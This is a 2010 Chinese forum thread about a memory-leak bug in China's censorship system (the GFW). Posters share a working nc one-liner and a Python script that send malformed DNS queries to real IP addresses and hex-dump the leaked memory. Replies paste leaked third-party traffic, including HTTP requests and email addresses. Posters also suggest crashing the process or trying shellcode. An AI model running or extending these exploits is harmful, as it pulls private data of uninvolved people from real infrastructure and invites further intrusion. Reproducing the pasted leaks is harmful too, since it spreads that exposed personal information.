发布新话题与讨论建议及审查说明
欢迎发布有讨论和阅读价值的话题;不欢迎嘲弄宗教、种族、地缘、性取向等话题。
推崇布拉格公民论坛《对话守则》:对话的目的是寻求真理,不是为了斗争;不做人身攻击;保持主题;辩论时要用证据;要分清对话与只准自己讲话的区别;尽量理解对方。
遵循《世界人权宣言》第十九条不对用户已发表言论进行删除处理;用户有权限删除本人已发表言论;编辑会合并重复话题。
 51 12
发新话题
收藏 订阅 推荐 打印

GFW溢出漏洞 2010-09-22

GFW溢出漏洞 2010-09-22

一条linux命令用于实时围观GFW审查机器溢出返回值。来自 http://twitter.com/gfwrev/status/25220534979
复制内容到剪贴板
代码:
while true; do printf "\0\0\1\0\0\1\0\0\0\0\0\0\6wux.ru\300" | nc -uq1 128.241.91.35 53 | hd -s20; done
时不时能偷窥到人民群众访问三俗网站的HTTP请求。哈哈。

[ 本帖最后由 id已被绿坝屏蔽 于 2010-9-29 19:01 编辑 ]
看到的都是些什么呀?看到下面这些乱码:

100428065610Z0!+�m}j9��a<�U
0911�    , �bA
  ��      wux.ru�$�xK90ABCDEF1234567890ABCDEF /�d=1&grade=3" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('g3','','http://va�    , �-
  ��      wux.ru�$�xK90ABCDEF1234567890ABCDEF��_�ntrol: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 0
Expires: Fri, 01 Ja�    , ���'
  ��      wux.ru�$�xK90ABCDEF1234567890ABCDEF���Content-Type: text/html
Last-Modified: Mon, 27 Sep 2010 08:21:47 GMT
Accept-Ranges: byte�    , �jyK
  ��      wux.ru�$�xK90ABCDEF1234567890ABCDEF/��� 2���^ �P0E�!E!�&���. ��%a1P�= �ԁ/"���5��[�En儺k^���ON�������ҩ~�lQM'L����������}�    , %=6�
引用:
原帖由 lehui99 于 2010-9-29 22:40 发表
看到的都是些什么呀?看到下面这些乱码:

100428065610Z0!+�m}j9��a
这个就是GFW流水线截获的出国边界流量。

回复 3楼 id已被绿坝屏蔽 的话题

最好让GFW进程crash

看到有很多访问 http://www.45setv.com/ 的。
引用:
原帖由 lehui99 于 2010-9-29 22:49 发表
最好让GFW进程crash

看到有很多访问 http://www.45setv.com/ 的。
师父搞TV,不用注册也可以看无码,利害啊
引用:
原帖由 lehui99 于 2010-9-29 22:49 发表
最好让GFW进程crash

看到有很多访问 http://www.45setv.com/ 的。
gfw也不会sb到没有监护daemon的地步。肯定有冗余进程保证进程崩溃自动respawn的。
这个不错,正在尝试。
确实snippet到不少被墙的地址。

0000014: 3264 ab0c 358d faad 4303 0003 0087 0303  2d..5...C.......
0000024: 00f1 0303 0016 045a 0669 466a 2048 5454  .......Z.iFj HTT
0000034: 502f 312e 310d 0a41 6363 6570 743a 202a  P/1.1..Accept: *
0000044: 2f2a 0d0a 5265 6665 7265 723a 2068 7474  /*..Referer: htt
0000054: 703a 2f2f 7777 772e 3933 3934 636c 7562  p://www.9394club
0000064: 2e63 6f6d 2f6e 6577 6262 732f 7669 6577  .com/newbbs/view
0000074: 7468 7265 6164 2e70 6870 3f74 6964 3d31  thread.php?tid=1
0000084: 3436 3334 2665 7874 7261 c00c 0001 0001  4634&extra......
0000094: 0000 012c 0004 9f6a 794b                 ...,...jyK
邮件也被GFW.

0000014: bf6f c4ae 7374 6572 4068 626a 7a78 2e63  .o..ster@hbjzx.c
0000024: 6f6d 2e63 6e0d 0a54 6f3a 2077 6573 7465  om.cn..To: weste
0000034: 726e 756e 696f 6e62 656e 4077 6573 7465  rnunionben@weste
0000044: 726e 756e 696f 6e2e 636f 6d0d 0a44 6174  rnunion.com..Dat
0000054: 653a 2054 6875 2c20 3330 2053 6570 2032  e: Thu, 30 Sep 2
0000064: 3031 3020 3032 3a35 393a 3030 202b 3038  010 02:59:00 +08
0000074: 3030 0d0a 4d49 4d45 2d56 6572 7369 6f6e  00..MIME-Version
0000084: 3a20 312e 300d 0a43 6f6e c00c 0001 0001  : 1.0..Con......
引用:
原帖由 麦圆 于 2010-9-30 03:10 发表
邮件也被GFW.

0000014: bf6f c4ae 7374 6572 4068 626a 7a78 2e63  .o..ster@hbjzx.c
0000024: 6f6d 2e63 6e0d 0a54 6f3a 2077 6573 7465  om.cn..To: weste
0000034: 726e 756e 696f 6e62 656e 4077 6573 7465 ...
西联汇款啊。汗。。。而且时间戳很一致。
哇,牛B了
引用:
原帖由 id已被绿坝屏蔽 于 2010-9-30 13:19 发表

西联汇款啊。汗。。。而且时间戳很一致。
这个漏洞太牛了,做了一个活生生的案例演示给大家看老大哥在偷窥什么。不会是正在利用GFW秘密特殊监视出入境的资金用途吧?
这段应该是网游升级的:
....yo","Data\sound_character.rho.comp","1313692646","5313536","4651637","30*
在国外用不了?已经把128.241.91.35换成国内IP了

hd: stdin: Illegal seek
no port[s] to connect to
hd: stdin: Illegal seek
no port[s] to connect to
hd: stdin: Illegal seek
no port[s] to connect to
引用:
原帖由 skyking0752 于 2010-9-29 23:15 发表


师父搞TV,不用注册也可以看无码,利害啊
我还以为楼主是你师父呢,原来是个网站的名字
引用:
原帖由 萧易寒 于 2010-9-30 15:39 发表
在国外用不了?已经把128.241.91.35换成国内IP了

hd: stdin: Illegal seek
no port[s] to connect to
hd: stdin: Illegal seek
no port[s] to connect to
hd: stdin: Illegal seek
no port[s] to connect to
是你的 hd 指令不支持stdin 的seek嘛,把hd换成xxd看。我这里头还能窥看着呢。
请教。。怎样看这些乱七八糟的东西阿?

为什么我的出来都是u.u.u.u.
1. 墙外nc的目标主机要是墙内的,墙内nc目标主机要是墙内的。
2. 要输出到文件。只要修改
引用:
; done
引用:
>>filename ; done
即可. 具体请搜索并参阅"shell 重定向"。
3.输出的内容显然是根据这时间内其截取到的通信而定。
@gfwrev:
引用:
$SOME_IP: 在国内的随便选一个国外的不在线的ip,反之亦然。     11:28 PM Sep 22nd  via web  

回复 21楼 麦圆 的话题

不在线的IP是指没有联网的IP?我怎么知道某个IP有没有联网呢?
引用:
原帖由 shelly 于 2010-9-30 22:58 发表
请教。。怎样看这些乱七八糟的东西阿?

Adobe Photoshop…………
引用:
原帖由 萧易寒 于 2010-9-30 15:39 发表
在国外用不了?已经把128.241.91.35换成国内IP了

hd: stdin: Illegal seek
no port[s] to connect to
hd: stdin: Illegal seek
no port[s] to connect to
hd: stdin: Illegal seek
no port[s] to connect to
国外溢出的话貌似只能得到一些BT协议流量。HTTP的没见到几个。
128.241.91.35 是dns服务器吗?没反应嘛
引用:
原帖由 laoyang 于 2010-10-1 13:15 发表
不在线的IP是指没有联网的IP?我怎么知道某个IP有没有联网呢?
在墙外,随便找一个内地ip嘛,很多ip都是无法链接的。
引用:
原帖由 四不象 于 2010-10-1 13:34 发表
128.241.91.35 是dns服务器吗?没反应嘛
墙外米反应就对了。
引用:
原帖由 麦圆 于 2010-10-1 20:18 发表


墙外米反应就对了。
墙是双向工作的。墙外向国内任意一个IP也可以获得溢出数据。但是很难看到HTTP的数据,据我观察基本都是BT协议。

比如在墙外主机运行这个命令
复制内容到剪贴板
代码:
$ while true; do printf "\0\0\1\0\0\1\0\0\0\0\0\0\6wux.ru\300" | nc -uq1 www.baidu.com 53 | xxd -s20; done
0000014: 56c5 f14b 3930 4142 4344 4546 3132 3334  V..K90ABCDEF1234
0000024: 3536 3738 3930 4142 4344 4546 f298 b43c  567890ABCDEF...<
0000034: dfcf c98c 8a7d d7b1 4c61 4f60 6208 7225  .....}..LaO`b.r%
0000044: 7a66 392f 04e4 c364 974d 902f 7d52 2dfd  zf9/...d.M./}R-.
0000054: 2094 54a2 5051 9968 624c d374 8db3 2928   .T.PQ.hbL.t..)(
0000064: 5561 5f30 e12a 258f e4a5 d120 da40 d030  Ua_0.*%.... .@.0
0000074: 124d 0dc8 399b a1a5 3101 42c7 014a 0909  .M..9...1.B..J..
0000084: 6a06 c041 c534 9372 2fa5 c00c 0001 0001  j..A.4.r/.......
0000094: 0000 012c 0004 cb62 0741                 ...,...b.A
0000014: eacf d899 02da 469b 8011 99ce 393a 696e  ......F.....9:in
0000024: 666f 5f68 6173 6832 303a b381 5a08 569e  fo_hash20:..Z.V.
0000034: 1489 13af e9ab a232 0c75 4b91 9468 6531  .......2.uK..he1
0000044: 3a71 393a 6765 745f 7065 6572 7331 3a74  :q9:get_peers1:t
0000054: 383a 3130 3034 3738 3538 313a 7931 3a71  8:100478581:y1:q
0000064: 657e 9762 8016 e991 a1c1 aada 3c66 9851  e~.b........<f.Q
0000074: d224 bd35 a31f 6e91 ef6e af71 5d8a a692  .$.5..n..n.q]...
0000084: d012 4041 fc90 00d2 4277 c00c 0001 0001  ..@A....Bw......
0000094: 0000 012c 0004 0807 c62d                 ...,.....-
一样可以看到一些结果。

info_hash 和 he1:q9:get_peers1:t8:100478581:y1:qe 就是BT协议里的东西 http://www.bittorrent.org/beps/bep_0005.html

[ 本帖最后由 id已被绿坝屏蔽 于 2010-10-2 12:31 编辑 ]

回复 28楼 id已被绿坝屏蔽 的话题

我指的是墙外对墙外的ip进行操作,那肯定是没反应的。
laoyang可以换www.baidu.com 53试试了。

回复 29楼 麦圆 的话题

好,昨天我用的是新浪的,一直没有看到什么东西 呵呵
引用:
原帖由 lehui99 于 2010-9-29 22:49 发表
最好让GFW进程crash

看到有很多访问 http://www.45setv.com/ 的。
弓虽
很神奇。。
get_peers1  多半是bt 流量
http%3A%2F%2|
00000054  46 73 68 61 72 65 2e 72  65 6e 72 65 6e 2e 63 6f  |Fshare.renren.co|
00000064  6d 25 32 46 73 68 61 72  65 25 32 46 47 65 74 53  |m%2Fshare%2FGetS|
00000074  68 61 72 65 2e 64 6f 25  33 46 69 64 25 33 44 33  |hare.do%3Fid%3D3|
00000084  34 30 37 37 35 39 37 30  34 25 32 36 6f 77 6e 65  |407759704%26owne|
00000094  72 25 33 44 33 32 c0 0c  00 01 00 01 00 00 01 2c  |r%3D32.
为了能在Windows下使用,改写成了python:
复制内容到剪贴板
代码:
import socket
import binascii
import time
import threading

class DataReceiver:
        def __init__(self, s):
                self.s = s
        def __call__(self):
                while True:
                        r = s.recvfrom(65535)[0]
                        i = 0
                        while i < len(r):
                                print '%04x:' % i,
                                p = list(r[i : i + 16])
                                for j in range(0, len(p)):
                                        print binascii.b2a_hex(p[j]),
                                        if p[j] < ' ' or p[j] > '~':
                                                p[j] = '.'
                                print ' ' * ((15 - j) * 3),
                                print "".join(p)
                                i += 16

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
threading.Thread(target = DataReceiver(s)).start()
while True:
        s.sendto("\0\0\1\0\0\1\0\0\0\0\0\0\6wux.ru\377", ("218.30.54.118", 53))
        time.sleep(0.001)
安装好python 2.6,把代码复制到记事本,保存为gfwoverflow.py,在命令行执行python gfwoverflow.py就能看到结果了。

[ 本帖最后由 lehui99 于 2010-10-8 22:02 编辑 ]
强啊,技术盲围观
引用:
原帖由 lehui99 于 2010-10-8 22:00 发表
为了能在Windows下使用,改写成了python:
import socket
import binascii
import time
import threading

class DataReceiver:
        def __init__(self, s):
                self.s = s
        def __call__(self):
                while True ...
好同学
但:
Exception in thread Thread-1:
Traceback (most recent call last):
  File "C:\Python26\lib\threading.py", line 525, in __bootstrap_inner
    self.run()
  File "C:\Python26\lib\threading.py", line 477, in run
    self.__target(*self.__args, **self.__kwargs)
  File "G:\gfw.py", line 11, in __call__
    r = s.recvfrom(65535)[0]
error: [Errno 10022]
小组技术实力确实很强啊。

回复 37楼 mycccc 的话题

python版本是多少?我这里是2.6,3.0可能会有问题。
或者尝试一下修改版:
复制内容到剪贴板
代码:
import socket
import binascii
import time
import threading

class DataReceiver:
        def __init__(self, s):
                self.s = s
        def __call__(self):
                while True:
                        try:
                                r = s.recvfrom(65535)[0]
                        except:
                                continue
                        i = 0
                        while i < len(r):
                                print '%04x:' % i,
                                p = list(r[i : i + 16])
                                for j in range(0, len(p)):
                                        print binascii.b2a_hex(p[j]),
                                        if p[j] < ' ' or p[j] > '~':
                                                p[j] = '.'
                                print ' ' * ((15 - j) * 3),
                                print "".join(p)
                                i += 16

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
threading.Thread(target = DataReceiver(s)).start()
while True:
        s.sendto("\0\0\1\0\0\1\0\0\0\0\0\0\6wux.ru\377", ("218.30.54.118", 53))
        time.sleep(0.001)
寫成  c++吧
不過返回數據有數量限制  具體沒看   應該是1個包的長度 2次返回的數據不連續  
返回的數據應該這個dns結果后面的ip數據 不過通過這些可以得到一些gfw的信息
引用:
原帖由 tywtyw2002 于 2010-10-9 07:52 发表
寫成  c++吧
组里有谁会C++吗?能改写一下吗?
引用:
原帖由 tywtyw2002 于 2010-10-9 07:53 发表
不過返回數據有數量限制  具體沒看   應該是1個包的長度 2次返回的數據不連續  
返回的數據應該這個dns結果后面的ip數據 不過通過這些可以得到一些gfw的信息
数据确实不连续,不过这也是GFW中内存的样子吧?
( ⊙o⊙ 围观技术宅

回复 40楼 lehui99 的话题

2.6运行40楼修正版ok~

回复 45楼 mycccc 的话题

在powercmd里运行python脚本
可以自动保存log
方便查看

5分钟1MB
量不大啊
引用:
原帖由 mycccc 于 2010-10-10 12:00 发表
在powercmd里运行python脚本
可以自动保存log
方便查看

5分钟1MB
量不大啊
dns一个包最大512字节。精通RFC 2671的想办法自己改吧。MTU弄大一点。。。但是估计就收不到了。其实这个溢出可以做成并发的。你可以躲开几个进程同时收集。

[ 本帖最后由 id已被绿坝屏蔽 于 2010-10-10 13:58 编辑 ]
发现填写不同的国外IP能看到不同的内容,把python脚本中的IP:218.30.54.118换成其他的IP(比如yahoo.com的IP)会看到大部分不同的内容。
引用:
原帖由 lehui99 于 2010-10-10 15:17 发表
发现填写不同的国外IP能看到不同的内容,把python脚本中的IP:218.30.54.118换成其他的IP(比如yahoo.com的IP)会看到大部分不同的内容。
估计飞指针飞到不同的内存区域了。有人去试试shellcode没?
完全看不懂.......
 51 12
发新话题

快速回复主题

 

[完成后可按 Ctrl+Enter 发布]  预览话题  恢复数据  清空内容

顾问:莫之许、北风、不锈钢老鼠、温克坚、艾未未、冉云飞、安替、崔卫平、闾丘露薇、章立凡 形象代言:宋石男 法律顾问:浦志强
编辑
:张书记、上肛上腺、抑扬、musicool、王祖贤、alix001、核子力量、四夕亚日、炽鸢侯、木火
技术:库存袈裟、麦圆、散光